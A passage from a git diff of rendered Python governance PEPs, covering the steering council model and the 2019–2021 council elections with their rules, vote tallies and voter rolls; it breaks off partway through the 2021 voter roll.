As with any other member of the Python community, the PSF Code of Conduct Workgroup can ban a core developer for a limited amount of time. In this case, the core developer immediately loses their core developer status. Core developers are expected to be exemplary when it comes to the Code of Conduct.

+

In general, a ban is only the last resort action when all other options +have been exhausted.

+

At the end of the ban, the developer is allowed to contribute again as a +regular contributor.

+

If the developer changes their behavior, another core developer can organize a new vote to propose the developer for promotion to core developer. The vote follows the same process as for any other Python contributor.

+
+
+
+

PEP process

+

There are 2 main roles on PEPs:

+
    +
  • PEP Authors
  • +
  • PEP Delegate
  • +
+

PEP authors do their best to write high quality PEPs.

+

The PEP delegate is responsible for helping the authors enhance their PEP and takes the final decision (accept, reject, or defer the PEP). They can also help guide the discussion.

+

If no decision is taken, the authors can propose the PEP again later (e.g. one year later), if possible with new data to motivate the change. A PEP delegate can also choose to mark a PEP as "Deferred", rather than rejecting it, to encourage reopening the discussion later.

+

PEPs specific to a Python team are discussed on the team mailing list. +PEPs impacting all Python developers (like language changes) must be +discussed on the python-dev mailing list.

+
+

Vote on a PEP

+

When the Python Steering Committee decides that a PEP needs a wider +approval, a vote is organized.

+

The vote is reserved to core developers, is public, is announced 1 week in advance, and is open for 1 week. The PEP can still be updated during the 1-week notice, but must not be modified during the vote. Such a vote happens on the mailing list where the PEP has been discussed. The committee decides when the vote is organized. The PEP must have been discussed for a reasonable amount of time before it is put to a vote.

+

A PEP is only approved if two thirds (>= 2/3) of votes approve ("+1") the PEP. Only "+1" and "-1" votes are counted; other votes (e.g. null, "-0", "+0.5") are ignored.

+

A PEP can only be approved or rejected by a vote, not deferred.

+
+
+
+

Lack of Decision

+

If a discussion fails to reach a consensus, if the Python Steering Committee fails to choose a PEP delegate, or if a PEP delegate fails to make a decision, the obvious risk is that Python fails to evolve.

+

That’s fine. Sometimes, doing nothing is the wisest choice.

+
+
+

Change this PEP

+

The first version of this PEP was written after Guido van Rossum decided to resign from his role as BDFL in July 2018. Before this PEP, the roles of Python community members had never been formalized. It is difficult to design a perfect organization on the first attempt. This PEP can be updated in the future to adjust the organization, specify how to handle corner cases, and fix mistakes.

+

Any change to this PEP must be validated by a vote. The vote is announced 3 weeks in advance, is reserved to core developers, happens in public on the python-committers mailing list, and is open for 1 week. The proposed PEP change can still be updated during the 3-week notice, but must not be modified during the vote.

+

The change is only approved if four fifths (>= 4/5) of votes approve ("+1") the change. Only "+1" and "-1" votes are counted; other votes (e.g. null, "-0", "+0.5") are ignored.

+
+
+

Annex: Summary on votes

Vote                | Notice  | Open   | Ballot  | Method
--------------------|---------|--------|---------|----------------------------------
Promote contributor | none    | 1 week | public  | >= 2/3 majority
PEP                 | 1 week  | 1 week | public  | >= 2/3 majority
Change this PEP     | 3 weeks | 1 week | public  | >= 4/5 majority
Steering Committee  | 3 weeks | 1 week | private | Condorcet (Schulze/Beatpath/CSSD)

All these votes are reserved to core developers.

+
+
+

Annex: Examples of Python Teams

+

Below are examples of some Python teams (the list will not be kept up to +date in this PEP).

+
+

Packaging Team

+

The packaging team runs its own PEP category and can approve (or reject) +their own PEPs.

+
    +
  • Website: packaging.python.org
  • +
  • Mailing list: distutils-sig
  • +
  • Bug tracker component: Distutils
  • +
  • Example of members: Paul Moore, Alyssa Coghlan, Donald Stufft
  • +
  • Stdlib module: distutils
  • +
  • Current PEP delegate: Paul Moore
  • +
+
+
+

IDLE Team

+

IDLE is a special case in the Python standard library: it’s a whole +application, not just a module. For this reason, it has been decided +that the code will be the same in all Python stable branches (whereas +the stdlib diverges in newer stable branches).

+
    +
  • Bug tracker component: IDLE
  • +
  • Example of members: Terry Reedy, Cheryl Sabella, Serhiy Storchaka
  • +
  • Stdlib module: idlelib
  • +
+
+
+

Mentorship Team

+

Becoming a core developer is a long and slow process. Mentorship is an efficient way to train contributors as future core developers and build a trust relationship.

+ +

Note: The group is not responsible for promoting core developers.

+
+
+

Documentation Team

+
    +
  • Mailing list: doc-sig
  • +
  • Bug tracker component: Documentation
  • +
  • GitHub tag: type-doc
  • +
  • Example of members: Julien Palard, INADA Naoki, Raymond Hettinger.
  • +
+

The team also manages documentation translations.

+

See also the Mentorship team which maintains the “Devguide”.

+
+
+

Security Team

+
    +
  • Website: https://www.python.org/news/security/
  • +
  • Mailing lists:
      +
    • security@python.org (to report vulnerabilities)
    • +
    • security-sig +(public list)
    • +
    +
  • +
  • Stdlib modules: hashlib, secrets and ssl
  • +
  • Example of members: Christian Heimes, Benjamin Peterson
  • +
+

The security@python.org mailing list is invite-only: only members of the "Python Security Response Team" (PSRT) can read and reply to emails, whereas security-sig is public.

+

Note: This team rarely proposes PEPs.

+
+
+

Performance Team

+ +

Usually PEPs involving performance impact everybody and so are discussed +on the python-dev mailing list, rather than the speed mailing list.

+
+
+

Asynchronous Programming Team

+ +

PEPs that only modify asyncio and contextvars can be discussed on the async-sig mailing list, whereas changes impacting the Python language must be discussed on python-dev.

+
+
+

Type Hints Team

+ +

Note: There is a backport for Python 3.6 and older, see +typing on PyPI.

+
+
+
+

Version History

+

History of this PEP:

+
    +
  • Version 7: Adjust the Steering Committee
      +
    • The Steering Committee is now made of 5 people instead of 3.
    • +
    • There are no term limits (instead of a limit of 2 mandates: +6 years in total).
    • +
    • A committee member can now be a PEP delegate.
    • +
    +
  • +
  • Version 6: Adjust votes
      +
    • Specify the Condorcet method: use Schulze/Beatpath/CSSD variant to +elect Python Steering Committee members. Specify how to deal with +tie and the constraint on the employers.
    • +
    • Vote on promoting a contributor and on PEPs now requires >= 2/3 +rather than 50%+1.
    • +
    • Vote on changing this PEP now requires >= 4/5 rather than +50%+1.
    • +
    • Explain how to deal with a company acquisition.
    • +
    +
  • +
  • Version 5: Election of Python Steering Committee Members uses secret +ballots
  • +
  • Version 4:
      +
    • Adjust votes: open for 1 week instead of 1 month, and announced +in advance.
    • +
    • Rename the “Python Core Board” to the “Python Steering Committee”;
    • +
    • Clarify that this committee doesn’t approve PEPs and that committee members cannot hold more than 2 mandates;
    • +
    • Add the “Type Hints” team to the annex.
    • +
    +
  • +
  • Version 3: Add “Special Case: Ban a core developer” and “How to update +this PEP” sections.
  • +
  • Version 2: Rename the “Python board” to the “Python Core Board”, +to avoid confusion with the PSF Board.
  • +
  • Version 1: First version posted to python-committers and +discuss.python.org.
  • +
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8015.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
diff --git a/pep-8016/index.html b/pep-8016/index.html
new file mode 100644
index 00000000000..9c67001c928
--- /dev/null
+++ b/pep-8016/index.html
+
+


+ + +
+
+
+

PEP 8016 – The Steering Council Model

+
+
Author:
+
Nathaniel J. Smith, Donald Stufft
+
Status:
+
Accepted
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
01-Nov-2018
+
+
+
+
+
+

Note

+

This PEP is retained for historical purposes, but the official +governance document is now PEP 13.

+
+
+

Abstract

+

This PEP proposes a model of Python governance based around a steering +council. The council has broad authority, which they seek to exercise +as rarely as possible; instead, they use this power to establish +standard processes, like those proposed in the other 801x-series PEPs. +This follows the general philosophy that it’s better to split up large +changes into a series of small changes that can be reviewed +independently: instead of trying to do everything in one PEP, we focus +on providing a minimal-but-solid foundation for further governance +decisions.

+
+
+

PEP Acceptance

+

PEP 8016 was accepted by a core developer vote +described in PEP 8001 on Monday, December 17, 2018.

+
+
+

Rationale

+

The main goals of this proposal are:

+
    +
  • Be boring: We’re not experts in governance, and we don’t think +Python is a good place to experiment with new and untried governance +models. So this proposal sticks to mature, well-known, previously +tested processes as much as possible. The high-level approach of a +mostly-hands-off council is arguably the most common across large +successful F/OSS projects, and low-level details are derived +directly from Django’s governance.
  • +
  • Be simple: We’ve attempted to pare things down to the minimum +needed to make this workable: the council, the core team (who elect +the council), and the process for changing the document. The goal is +Minimum Viable Governance.
  • +
  • Be comprehensive: But for the things we need to define, we’ve +tried to make sure to cover all the bases, because we don’t want to +go through this kind of crisis again. Having a clear and unambiguous +set of rules also helps minimize confusion and resentment.
  • +
  • Be flexible and light-weight: We know that it will take time and +experimentation to find the best processes for working together. By +keeping this document as minimal as possible, we keep maximal +flexibility for adjusting things later, while minimizing the need +for heavy-weight and anxiety-provoking processes like whole-project +votes.
  • +
+

A number of details were discussed in this Discourse thread, +and then this thread has further discussion. These +may be useful to anyone trying to understand the rationale for various +minor decisions.

+
+
+

Specification

+
+

The steering council

+
+

Composition

+

The steering council is a 5-person committee.

+
+
+

Mandate

+

The steering council shall work to:

+
    +
  • Maintain the quality and stability of the Python language and +CPython interpreter,
  • +
  • Make contributing as accessible, inclusive, and sustainable as +possible,
  • +
  • Formalize and maintain the relationship between the core team and +the PSF,
  • +
  • Establish appropriate decision-making processes for PEPs,
  • +
  • Seek consensus among contributors and the core team before acting in +a formal capacity,
  • +
  • Act as a “court of final appeal” for decisions where all other +methods have failed.
  • +
+
+
+

Powers

+

The council has broad authority to make decisions about the project. +For example, they can:

+
    +
  • Accept or reject PEPs
  • +
  • Enforce or update the project’s code of conduct
  • +
  • Work with the PSF to manage any project assets
  • +
  • Delegate parts of their authority to other subcommittees or +processes
  • +
+

However, they cannot modify this PEP, or affect the membership of the +core team, except via the mechanisms specified in this PEP.

+

The council should look for ways to use these powers as little as +possible. Instead of voting, it’s better to seek consensus. Instead of +ruling on individual PEPs, it’s better to define a standard process +for PEP decision making (for example, by accepting one of the other +801x series of PEPs). It’s better to establish a Code of Conduct +committee than to rule on individual cases. And so on.

+

To use its powers, the council votes. Every council member must either +vote or explicitly abstain. Members with conflicts of interest on a +particular vote must abstain. Passing requires support from a majority +of non-abstaining council members.
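As a small illustration (the vote encoding is an assumption, not part of the PEP), the passing condition could be checked like this:

    def motion_passes(votes):
        # votes: one entry per council member: "yes", "no", or "abstain".
        yes = votes.count("yes")
        no = votes.count("no")
        # Passing requires support from a majority of the
        # non-abstaining members.
        return yes > (yes + no) / 2

    print(motion_passes(["yes", "yes", "no", "abstain", "abstain"]))  # True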

+

Whenever possible, the council’s deliberations and votes shall be held +in public.

+
+
+

Electing the council

+

A council election consists of two phases:

+
    +
  • Phase 1: Candidates advertise their interest in serving. Candidates +must be nominated by a core team member. Self-nominations are +allowed.
  • +
  • Phase 2: Each core team member can vote for zero to five of the candidates. Voting is performed anonymously. Candidates are ranked by the total number of votes they receive. If a tie occurs, it may be resolved by mutual agreement among the candidates, or else the winner will be chosen at random (a toy tally is sketched after this list).
  • +
+
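A minimal sketch of the phase-2 tally (data shapes are assumptions; the random key models only the fallback tie-break, not mutual agreement):

    import random
    from collections import Counter

    def elect_council(ballots, seats=5):
        # Each ballot is a set of zero to five approved candidates.
        tally = Counter()
        for ballot in ballots:
            tally.update(ballot)
        # Rank by total approvals; remaining ties are broken at random
        # via a random secondary sort key.
        ranked = sorted(tally, key=lambda c: (tally[c], random.random()),
                        reverse=True)
        return ranked[:seats]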

Each phase lasts one to two weeks, at the outgoing council’s discretion. +For the initial election, both phases will last two weeks.

+

The election process is managed by a returns officer nominated by the +outgoing steering council. For the initial election, the returns +officer will be nominated by the PSF Executive Director.

+

The council should ideally reflect the diversity of Python +contributors and users, and core team members are encouraged to vote +accordingly.

+
+
+

Term

+

A new council is elected after each feature release. Each council’s +term runs from when their election results are finalized until the +next council’s term starts. There are no term limits.

+
+
+

Vacancies

+

Council members may resign their position at any time.

+

Whenever there is a vacancy during the regular council term, the +council may vote to appoint a replacement to serve out the rest of the +term.

+

If a council member drops out of touch and cannot be contacted for a +month or longer, then the rest of the council may vote to replace +them.

+
+
+

Conflicts of interest

+

While we trust council members to act in the best interests of Python +rather than themselves or their employers, the mere appearance of any +one company dominating Python development could itself be harmful and +erode trust. In order to avoid any appearance of conflict of interest, +at most 2 members of the council can work for any single employer.

+

In a council election, if 3 of the top 5 vote-getters work for the +same employer, then whichever of them ranked lowest is disqualified +and the 6th-ranking candidate moves up into 5th place; this is +repeated until a valid council is formed.

+

During a council term, if changing circumstances cause this rule to be +broken (for instance, due to a council member changing employment), +then one or more council members must resign to remedy the issue, and +the resulting vacancies can then be filled as normal.

+
+
+

Ejecting core team members

+

In exceptional circumstances, it may be necessary to remove someone +from the core team against their will. (For example: egregious and +ongoing code of conduct violations.) This can be accomplished by a +steering council vote, but unlike other steering council votes, this +requires at least a two-thirds majority. With 5 members voting, this +means that a 3:2 vote is insufficient; 4:1 in favor is the minimum +required for such a vote to succeed. In addition, this is the one +power of the steering council which cannot be delegated, and this +power cannot be used while a vote of no confidence is in process.

+

If the ejected core team member is also on the steering council, then +they are removed from the steering council as well.

+
+
+

Vote of no confidence

+

In exceptional circumstances, the core team may remove a sitting +council member, or the entire council, via a vote of no confidence.

+

A no-confidence vote is triggered when a core team member calls for +one publicly on an appropriate project communication channel, and +another core team member seconds the proposal.

+

The vote lasts for two weeks. Core team members vote for or against. +If at least two thirds of voters express a lack of confidence, then +the vote succeeds.

+

There are two forms of no-confidence votes: those targeting a single +member, and those targeting the council as a whole. The initial call +for a no-confidence vote must specify which type is intended. If a +single-member vote succeeds, then that member is removed from the +council and the resulting vacancy can be handled in the usual way. If +a whole-council vote succeeds, the council is dissolved and a new +council election is triggered immediately.

+
+
+
+

The core team

+
+

Role

+

The core team is the group of trusted volunteers who manage Python. +They assume many roles required to achieve the project’s goals, +especially those that require a high level of trust. They make the +decisions that shape the future of the project.

+

Core team members are expected to act as role models for the community +and custodians of the project, on behalf of the community and all +those who rely on Python.

+

They will intervene, where necessary, in online discussions or at +official Python events on the rare occasions that a situation arises +that requires intervention.

+

They have authority over the Python Project infrastructure, including +the Python Project website itself, the Python GitHub organization and +repositories, the bug tracker, the mailing lists, IRC channels, etc.

+
+
+

Prerogatives

+

Core team members may participate in formal votes, typically to nominate new +team members and to elect the steering council.

+
+
+

Membership

+

Python core team members demonstrate:

+
    +
  • a good grasp of the philosophy of the Python Project
  • +
  • a solid track record of being constructive and helpful
  • +
  • significant contributions to the project’s goals, in any form
  • +
  • willingness to dedicate some time to improving Python
  • +
+

As the project matures, contributions go beyond code. Here’s an +incomplete list of areas where contributions may be considered for +joining the core team, in no particular order:

+
    +
  • Working on community management and outreach
  • +
  • Providing support on the mailing lists and on IRC
  • +
  • Triaging tickets
  • +
  • Writing patches (code, docs, or tests)
  • +
  • Reviewing patches (code, docs, or tests)
  • +
  • Participating in design decisions
  • +
  • Providing expertise in a particular domain (security, i18n, etc.)
  • +
  • Managing the continuous integration infrastructure
  • +
  • Managing the servers (website, tracker, documentation, etc.)
  • +
  • Maintaining related projects (alternative interpreters, core +infrastructure like packaging, etc.)
  • +
  • Creating visual designs
  • +
+

Core team membership acknowledges sustained and valuable efforts that +align well with the philosophy and the goals of the Python project.

+

It is granted by receiving at least two-thirds positive votes in a +core team vote and no veto by the steering council.

+

Core team members are always looking for promising contributors, +teaching them how the project is managed, and submitting their names +to the core team’s vote when they’re ready.

+

There’s no time limit on core team membership. However, in order to +provide the general public with a reasonable idea of how many people +maintain Python, core team members who have stopped contributing are +encouraged to declare themselves as “inactive”. Those who haven’t made +any non-trivial contribution in two years may be asked to move +themselves to this category, and moved there if they don’t respond. To +record and honor their contributions, inactive team members will +continue to be listed alongside active core team members; and, if they +later resume contributing, they can switch back to active status at +will. While someone is in inactive status, though, they lose their +active privileges like voting or nominating for the steering council, +and commit access.

+

The initial active core team members will consist of everyone +currently listed in the “Python core” team on GitHub, and the +initial inactive members will consist of everyone else who has been a +committer in the past.

+
+
+
+

Changing this document

+

Changes to this document require at least a two-thirds majority of +votes cast in a core team vote.

+
+
+
+

TODO

+
    +
  • Lots of people contributed helpful suggestions and feedback; we +should check if they’re comfortable being added as co-authors
  • +
  • It looks like Aymeric Augustin wrote the whole Django doc, so +presumably holds copyright; maybe we should ask him if he’s willing +to release it into the public domain so our copyright statement +below can be simpler.
  • +
+
+
+

Acknowledgements

+

Substantial text was copied shamelessly from The Django project’s +governance document.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8016.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
diff --git a/pep-8100/index.html b/pep-8100/index.html
new file mode 100644
index 00000000000..47bdb71ab8d
--- /dev/null
+++ b/pep-8100/index.html
+
+


+ + +
+
+
+

PEP 8100 – January 2019 Steering Council election

+
+
Author:
+
Nathaniel J. Smith <njs at pobox.com>, Ee Durbin <ee at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
03-Jan-2019
+
+
+
+
+
+

Abstract

+

This document describes the schedule and other details of the January +2019 election for the Python steering council, as specified in +PEP 13. This is the first steering council election.

+
+
+

Returns officer

+

In future elections, the returns officer will be appointed by the +outgoing steering council. Since this is the first election, we have +no outgoing steering council, and PEP 13 says that the returns officer +is instead appointed by the PSF Executive Director, Ewa Jodlowska. +She appointed Ee Durbin.

+
+
+

Schedule

+

There will be a two-week nomination period, followed by a two-week +vote.

+

The nomination period is: January 7, 2019 through January 20, 2019

+

The voting period is: January 21, 2019 12:00 UTC through February 4, 2019 12:00 +UTC (The end of February 3, 2019 Anywhere on Earth)

+
+
+

Candidates

+

Candidates must be nominated by a core team member. If the candidate +is a core team member, they may nominate themselves.

+

Once the nomination period opens, candidates will be listed here:

+
  1. Brett Cannon
  2. Alyssa (Nick) Coghlan
  3. Barry Warsaw
  4. Guido van Rossum
  5. Victor Stinner
  6. Yury Selivanov
  7. David Mertz
  8. Łukasz Langa
  9. Benjamin Peterson
 10. Mariatta
 11. Carol Willing
 12. Emily Morehouse
 13. Peter Wang
 14. Donald Stufft
 15. Travis Oliphant
 16. Kushal Das
 17. Gregory P. Smith
+
+
+

Voter Roll

+

All active Python core team members are eligible to vote.

+

Ballots will be distributed based on the Python Voter Roll for this election [1].

+

While this file is not public as it contains private email addresses, the +Complete Voter Roll by name is available.

+
+
+

Election Implementation

+

The election will be conducted using the Helios Voting Service.

+
+

Configuration

+

Short name: 2019-python-steering-committee

+

Name: 2019 Python Steering Committee Election

+

Description: Election for the Python steering council, as specified in PEP 13. This is the first steering council election.

+

type: Election

+

Use voter aliases: [X]

+

Randomize answer order: [X]

+

Private: [X]

+

Help Email Address: ee@python.org

+

Voting starts at: January 21, 2019 12:00 UTC

+

Voting ends at: February 4, 2019 12:00 UTC

+

This will create an election in which:

+
    +
  • Voting is not open to the public, only those on the Voter Roll may +participate. Ballots will be emailed when voting starts.
  • +
  • Candidates are presented in random order, to help avoid bias.
  • +
  • Voter identities and ballots are protected against cryptographic advances.
  • +
+
+
+

Questions

+
+

Question 1

+

Select between 0 and 5 answers. Result Type: absolute

+

Question: Select candidates for the Python Steering Council

+

Answer #1 - #N: Candidates from Candidates_ Section

+
+
+
+
+

Results

+

Of the 96 eligible voters, 69 cast ballots.

+

The top five vote-getters are:

+
    +
  • Barry Warsaw
  • +
  • Brett Cannon
  • +
  • Carol Willing
  • +
  • Guido van Rossum
  • +
  • Alyssa (Nick) Coghlan
  • +
+

No conflicts of interest as defined in PEP 13 were observed.

+

The full vote counts are as follows:

Candidate             | Votes Received
----------------------|---------------
Guido van Rossum      | 45
Brett Cannon          | 44
Carol Willing         | 33
Barry Warsaw          | 31
Alyssa (Nick) Coghlan | 25
Benjamin Peterson     | 22
Łukasz Langa          | 21
Victor Stinner        | 21
Mariatta              | 20
Emily Morehouse       | 18
Yury Selivanov        | 15
Donald Stufft         | 11
Peter Wang            | 10
Travis Oliphant       | 8
Kushal Das            | 7
Gregory P. Smith      | 6
David Mertz           | 3
+ +
+

Complete Voter Roll

+
+

Active Python core developers

+
Alex Gaynor
+Alex Martelli
+Alexander Belopolsky
+Alexandre Vassalotti
+Amaury Forgeot d'Arc
+Andrew Kuchling
+Andrew Svetlov
+Antoine Pitrou
+Armin Ronacher
+Barry Warsaw
+Benjamin Peterson
+Berker Peksag
+Brett Cannon
+Brian Curtin
+Carol Willing
+Chris Jerdonek
+Chris Withers
+Christian Heimes
+David Malcolm
+David Wolever
+Davin Potts
+Dino Viehland
+Donald Stufft
+Doug Hellmann
+Eli Bendersky
+Emily Morehouse
+Éric Araujo
+Eric Snow
+Eric V. Smith
+Ethan Furman
+Ezio Melotti
+Facundo Batista
+Fred Drake
+Georg Brandl
+Giampaolo Rodola'
+Gregory P. Smith
+Guido van Rossum
+Hyeshik Chang
+Hynek Schlawack
+INADA Naoki
+Ivan Levkivskyi
+Jack Diederich
+Jack Jansen
+Jason R. Coombs
+Jeff Hardy
+Jeremy Hylton
+Jesús Cea
+Julien Palard
+Kurt B. Kaiser
+Kushal Das
+Larry Hastings
+Lars Gustäbel
+Lisa Roach
+Łukasz Langa
+Marc-Andre Lemburg
+Mariatta
+Mark Dickinson
+Mark Hammond
+Mark Shannon
+Martin Panter
+Matthias Klose
+Meador Inge
+Michael Hudson-Doyle
+Nathaniel J. Smith
+Ned Deily
+Neil Schemenauer
+Alyssa Coghlan
+Pablo Galindo
+Paul Moore
+Petr Viktorin
+Petri Lehtinen
+Philip Jenvey
+R. David Murray
+Raymond Hettinger
+Robert Collins
+Ronald Oussoren
+Sandro Tosi
+Senthil Kumaran
+Serhiy Storchaka
+Sjoerd Mullender
+Stefan Krah
+Steve Dower
+Steven Daprano
+T. Wouters
+Tal Einat
+Terry Jan Reedy
+Thomas Heller
+Tim Golden
+Tim Peters
+Trent Nelson
+Victor Stinner
+Vinay Sajip
+Walter Dörwald
+Xiang Zhang
+Yury Selivanov
+Zachary Ware
+
+
+ +
+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8100.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
diff --git a/pep-8101/index.html b/pep-8101/index.html
new file mode 100644
index 00000000000..0023ef86cdc
--- /dev/null
+++ b/pep-8101/index.html
+
+


+ + +
+
+
+

PEP 8101 – 2020 Term Steering Council election

+
+
Author:
+
Ewa Jodlowska <ewa at python.org>, Ee Durbin <ee at python.org>
+
Sponsor:
+
Brett Cannon <brett at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
16-Nov-2019
+
+
+
+
+
+

Abstract

+

This document describes the schedule and other details of the December 2019 election for the Python steering council, as specified in PEP 13. This is the steering council election for the 2020 term.

+
+
+

Election Administration

+

The steering council appointed the +Python Software Foundation +Director of Infrastructure, Ee Durbin, to implement the election, +and Python Software Foundation +Executive Director, Ewa Jodlowska, to communicate announcements +regarding the election.

+
+
+

Schedule

+

There will be a two-week nomination period, followed by a two-week +vote.

+

The nomination period was: November 1, 2019 through November 16, 2019 12:00 UTC (The end of November 15, 2019 Anywhere on Earth). It was announced on python-committers and took place on discuss.python.org.

+

The voting period is: December 1, 2019 12:00 UTC through December 16, 2019 +12:00 UTC (The end of December 15, 2019 Anywhere on Earth).

+
+
+

Candidates

+

Candidates must be nominated by a core team member. If the candidate +is a core team member, they may nominate themselves.

+

Nominees (in alphabetical order):

+ +

Withdrawn nominations:

+ +
+
+

Voter Roll

+

All active Python core team members are eligible to vote.

+

Ballots will be distributed based on the Python Voter Roll for this election [1].

+

While this file is not public as it contains private email addresses, the +Complete Voter Roll by name is available.

+
+
+

Election Implementation

+

The election will be conducted using the Helios Voting Service.

+
+

Configuration

+

Short name: 2020-python-steering-council

+

Name: 2020 Python Steering Council Election

+

Description: Election for the Python steering council, as specified in PEP 13. This is steering council election for the 2020 term.

+

type: Election

+

Use voter aliases: [X]

+

Randomize answer order: [X]

+

Private: [X]

+

Help Email Address: ee@python.org

+

Voting starts at: December 1, 2019 12:00 UTC

+

Voting ends at: December 16, 2019 12:00 UTC

+

This will create an election in which:

+
    +
  • Voting is not open to the public, only those on the Voter Roll may +participate. Ballots will be emailed when voting starts.
  • +
  • Candidates are presented in random order, to help avoid bias.
  • +
  • Voter identities and ballots are protected against cryptographic advances.
  • +
+
+
+

Questions

+
+

Question 1

+

Select between 0 and - (approval) answers. Result Type: absolute

+

Question: Select candidates for the Python Steering Council

+

Answer #1 - #N: Candidates from Candidates_ Section

+
+
+
+
+

Results

+

Of 82 eligible voters, 63 cast ballots.

+

The top five vote-getters are:

+
    +
  • Barry Warsaw
  • +
  • Brett Cannon
  • +
  • Carol Willing
  • +
  • Thomas Wouters
  • +
  • Victor Stinner
  • +
+

No conflicts of interest as defined in PEP 13 were observed.

+

The full vote counts are as follows:

Candidate             | Votes Received
----------------------|---------------
Brett Cannon          | 54
Carol Willing         | 54
Barry Warsaw          | 50
Thomas Wouters        | 40
Victor Stinner        | 38
Christian Heimes      | 37
Pablo Galindo Salgado | 37
Gregory P. Smith      | 32
Kushal Das            | 30
+ +
+

Complete Voter Roll

+
+

Active Python core developers

+
Abhilash Raj
+Alex Gaynor
+Alex Martelli
+Alexander Belopolsky
+Andrew Kuchling
+Andrew Svetlov
+Antoine Pitrou
+Barry Warsaw
+Benjamin Peterson
+Berker Peksağ
+Brett Cannon
+Brian Curtin
+Brian Quinlan
+Carol Willing
+Cheryl Sabella
+Chris Withers
+Christian Heimes
+Christian Tismer
+Davin Potts
+Dino Viehland
+Donald Stufft
+Emily Morehouse
+Éric Araujo
+Eric Snow
+Eric V. Smith
+Ethan Furman
+Ezio Melotti
+Facundo Batista
+Fred Drake
+Giampaolo Rodolà
+Gregory P. Smith
+Guido van Rossum
+Inada Naoki
+Ivan Levkivskyi
+Jason R. Coombs
+Jeremy Kloth
+Jesús Cea
+Joannah Nanjekye
+Julien Palard
+Kurt B. Kaiser
+Kushal Das
+Larry Hastings
+Lisa Roach
+Łukasz Langa
+Marc-André Lemburg
+Mariatta
+Mark Dickinson
+Mark Shannon
+Matthias Klose
+Michael Foord
+Nathaniel J. Smith
+Ned Deily
+Neil Schemenauer
+Alyssa Coghlan
+Pablo Galindo
+Paul Ganssle
+Paul Moore
+Petr Viktorin
+R. David Murray
+Raymond Hettinger
+Robert Collins
+Ronald Oussoren
+Senthil Kumaran
+Serhiy Storchaka
+Skip Montanaro
+Stefan Behnel
+Stefan Krah
+Steve Dower
+Steven D'Aprano
+Stéphane Wirtel
+Tal Einat
+Terry Jan Reedy
+Thomas Wouters
+Tim Golden
+Tim Peters
+Victor Stinner
+Vinay Sajip
+Walter Dörwald
+Xavier de Gaye
+Xiang Zhang
+Yury Selivanov
+Zachary Ware
+
+
+ +
+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-8101.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
diff --git a/pep-8102/index.html b/pep-8102/index.html
new file mode 100644
index 00000000000..c230890ce44
--- /dev/null
+++ b/pep-8102/index.html
+
+


+ + +
+
+
+

PEP 8102 – 2021 Term Steering Council election

+
+
Author:
+
Ewa Jodlowska <ewa at python.org>, Ee Durbin <ee at python.org>, Joe Carey <joe at python.org>
+
Sponsor:
+
Brett Cannon <brett at python.org>
+
Status:
+
Final
+
Type:
+
Informational
+
Topic:
+
Governance
+
Created:
+
29-Oct-2020
+
+
+
+
+
+

Abstract

+

This document describes the schedule and other details of the December +2020 election for the Python steering council, as specified in +PEP 13. This is the steering council election for the 2021 term.

+
+
+

Election Administration

+

The steering council appointed the +Python Software Foundation +Director of Infrastructure, Ee Durbin, +and Accounting Manager, Joe Carey, to coadminister the election.

+

Python Software Foundation +Executive Director, Ewa Jodlowska, will communicate announcements +regarding the election.

+
+
+

Schedule

+

There will be a two-week nomination period, followed by a two-week +vote.

+

The nomination period was: November 1, 2020 through November 16, 2020 12:00 UTC (The end of November 15, 2020 Anywhere on Earth). It was announced on python-committers and took place on discuss.python.org.

+

The voting period is: December 1, 2020 12:00 UTC through December 16, 2020 +12:00 UTC (The end of December 15, 2020 Anywhere on Earth).

+
+
+

Candidates

+

Candidates must be nominated by a core team member. If the candidate +is a core team member, they may nominate themselves.

+

Nominees (in alphabetical order):

+ +

Withdrawn nominations:

+
    +
  • None
  • +
+
+
+

Voter Roll

+

All active Python core team members are eligible to vote. Active status +is determined as described in PEP 13 +and implemented via the software at python/voters [1].

+

Ballots will be distributed based on the Python Voter Roll for this election [1].

+

While this file is not public as it contains private email addresses, the +Complete Voter Roll by name will be made available when the roll is +created.

+
+
+

Election Implementation

+

The election will be conducted using the Helios Voting Service.

+
+

Configuration

+

Short name: 2021-python-steering-council

+

Name: 2021 Python Steering Council Election

+

Description: Election for the Python steering council, as specified in PEP 13. This is steering council election for the 2021 term.

+

type: Election

+

Use voter aliases: [X]

+

Randomize answer order: [X]

+

Private: [X]

+

Help Email Address: psf-election@python.org

+

Voting starts at: December 1, 2020 00:00 UTC

+

Voting ends at: December 16, 2020 12:00 UTC

+

This will create an election in which:

+
    +
  • Voting is not open to the public, only those on the Voter Roll may +participate. Ballots will be emailed when voting starts.
  • +
  • Candidates are presented in random order, to help avoid bias.
  • +
  • Voter identities and ballots are protected against cryptographic advances.
  • +
+
+
+

Questions

+
+

Question 1

+

Select between 0 and - (approval) answers. Result Type: absolute

+

Question: Select candidates for the Python Steering Council

+

Answer #1 - #N: Candidates from Candidates_ Section

+
+
+
+
+

Results

+

Of 91 eligible voters, 74 cast ballots.

+

The top five vote-getters are:

+
    +
  • Barry Warsaw
  • +
  • Brett Cannon
  • +
  • Carol Willing
  • +
  • Pablo Galindo Salgado
  • +
  • Thomas Wouters
  • +
+

No conflicts of interest as defined in PEP 13 were observed.

+

The full vote counts are as follows:

Candidate             | Votes Received
----------------------|---------------
Pablo Galindo Salgado | 59
Carol Willing         | 57
Barry Warsaw          | 56
Brett Cannon          | 54
Thomas Wouters        | 52
Christian Heimes      | 43
Mariatta              | 42
Raymond Hettinger     | 31
David Mertz           | 28
Matt Harrison         | 15
+ +
+

Complete Voter Roll

+
+

Active Python core developers

+
Abhilash Raj
+Alex Gaynor
+Alex Martelli
+Alexander Belopolsky
+Andrew Kuchling
+Andrew Svetlov
+Antoine Pitrou
+Barry Warsaw
+Batuhan Taskaya
+Benjamin Peterson
+Berker Peksağ
+Brandt Bucher
